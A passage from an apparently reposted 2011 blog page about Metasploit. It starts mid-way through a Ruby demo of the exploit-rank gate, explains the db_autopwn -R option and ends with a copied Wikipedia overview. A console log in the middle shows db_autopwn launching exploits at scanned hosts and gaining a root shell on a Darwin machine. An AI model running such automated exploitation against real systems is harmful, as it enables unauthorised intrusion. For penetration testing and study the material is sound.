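  # Equivalent of the MinimumRank gate that `exploit` applies; +force+ plays
  # the role of `exploit -f`, which overrides the global setting.
  def self.run_allowed?(rank, minimum, force: false)
    force || meets?(rank, minimum)
  end

  # Message printed when the gate refuses, modelled on the console output above.
  def self.refusal_message(minimum)
    "This exploit is below the minimum rank, '#{minimum}'. " \
      "Run 'exploit -f' to override, or setg MinimumRank to something lower."
  end
end

if __FILE__ == $PROGRAM_NAME
  puts RankDemo.search(RankDemo::SAMPLE_MODULES, 'great')
  puts RankDemo.refusal_message('excellent') unless RankDemo.run_allowed?('great', 'excellent')
end
```

With the sample catalogue, a threshold of `excellent` keeps only psexec and qtss_parse_xml_exec, the same two module families that survive the `-R excellent` filter in the db_autopwn listing further down; lowering the threshold to `manual` keeps everything. The `db_autopwn -R` option applies this same comparison during automated exploit matching, which is why it cuts both run time and the chance of crashing a target service.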

The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. From the nexpose_scan or db_autopwn commands, the "-R" parameter can be used to specify the minimum rank. This instructs the exploit matching algorithm to only run exploits with that rank or better, which not only speeds up the exploit process, but reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to only target vulnerabilities where the exploit is ranked excellent:

msf exploit(psexec) > db_autopwn -b -x -t
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.41.188:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.47.203:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.37.182:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.32.2:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.32.2:139 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.44.223:139 exploit/solaris/samba/trans2open (CVE-2003-0201, BID-7294)
[*] XX.YY.44.223:139 exploit/multi/samba/nttrans (CVE-2003-0085, BID-7106)
[*] XX.YY.47.203:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.47.203:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.72.243:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] XX.YY.72.243:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] XX.YY.37.182:445 exploit/osx/samba/lsa_transnames_heap (CVE-2007-2446, OSVDB-34699)
[*] XX.YY.34.236:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:135 exploit/windows/dcerpc/ms03_026_dcom (CVE-2003-0352, BID-8205)
[*] XX.YY.41.188:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)


msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*] XX.YY.44.223:1220 exploit/unix/webapp/qtss_parse_xml_exec (CVE-2003-0050, BID-6954)
[*] XX.YY.77.234:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*] XX.YY.35.195:445 exploit/windows/smb/psexec (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)


msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions


Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 192.168.198.128:45146 -> XX.YY.44.223:32554 unix/webapp/qtss_parse_xml_exec

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC Power Macintosh powerpc

id
uid=0(root) gid=0(wheel) groups=0(wheel)
Posted by Triany
2011. 9. 29. 12:18

Metasploit Project

From Wikipedia, the free encyclopedia
Metasploit Framework
"Point. Click. Root."
Developer(s): Rapid7 LLC
Stable release: 4.0 / August 1, 2011; 58 days ago (2011-08-01)
Development status: Active
Operating system: Cross-platform
Type: Security
License: BSD
Website: http://www.metasploit.com/

The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

The Metasploit Project is also well-known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Metasploit was created by HD Moore in 2003 as a portable network tool using the Perl scripting language. The Metasploit Framework was later completely rewritten in the Ruby programming language.[1] In addition, it is a tool for third-party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced[2] that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.

Like comparable commercial products such as Immunity's Canvas or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.

Metasploit's emerging position as the de facto exploit development framework[3] has led in recent times to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug.[4][5] Metasploit 3.0 (Ruby language) is also beginning to include fuzzing tools, to discover software vulnerabilities, rather than merely writing exploits for currently public bugs. This new avenue has been seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.

Metasploit Framework

The basic steps for exploiting a system using the Framework include:

  1. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 300 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
  2. Checking whether the intended target system is susceptible to the chosen exploit (optional);
  3. Choosing and configuring a payload (code that will be executed on the target system upon successful entry, for instance a remote shell or a VNC server);
  4. Choosing the encoding technique to encode the payload so that the intrusion-prevention system (IPS) will not catch the encoded payload;
  5. Executing the exploit.

This modularity, which allows any exploit to be combined with any payload, is the major advantage of the Framework: it facilitates the tasks of attackers, exploit writers, and payload writers.

Versions of the Metasploit Framework since v3.0 are written in the Ruby programming language. The previous version, 2.7, was implemented in Perl. It runs on all versions of Unix (including Linux and Mac OS X), and also on Windows. It includes two command-line interfaces, a web-based interface and a native GUI. The web interface is intended to be run from the attacker's computer. The Metasploit Framework can be extended to use external add-ons in multiple languages.

To choose an exploit and payload, some information about the target system is needed such as operating system version and installed network services. This information can be gleaned with port scanning and OS fingerprinting tools such as nmap. Vulnerability scanners such as NeXpose or Nessus can detect the target system vulnerabilities. Metasploit can import vulnerability scan data and compare the identified vulnerabilities to existing exploit modules for accurate exploitation.

Metasploit Express

In April 2010, Rapid7 released Metasploit Express, an open-core commercial edition for security teams who need to verify vulnerabilities.[6] Built on the Metasploit Framework, it offers a graphical user interface, integrates nmap for discovery, and adds smart bruteforcing as well as automated evidence collection.[7] Rapid7 offers a 7-day trial for Metasploit Express.[8]

Metasploit Pro

In October 2010, Rapid7 added Metasploit Pro, an open-core commercial Metasploit edition for penetration testers.[9] Metasploit Pro includes all features of Metasploit Express and adds web application scanning and exploitation, social engineering campaigns, and VPN pivoting.[10] Metasploit Pro is available as a 7-day trial.[11]

Payloads

Metasploit offers many types of payloads, including:

  • Command shell enables users to run collection scripts or run arbitrary commands against the host.
  • Meterpreter enables users to control the screen of a device using VNC and to browse, upload and download files.

Opcode Database

The Opcode Database is an important resource for writers of new exploits. Buffer overflow exploits on Windows often require precise knowledge of the position of certain machine language opcodes in the attacked program or included DLLs. These positions differ in the various versions and patch-levels of a given operating system, and they are all documented and conveniently searchable in the Opcode Database. This allows one to write buffer overflow exploits which work across different versions of the target operating system.

Shellcode Database

The Shellcode database contains the payloads (also known as shellcode) used by the Metasploit Framework. These are written in assembly language and full source code is available.

Posted by Triany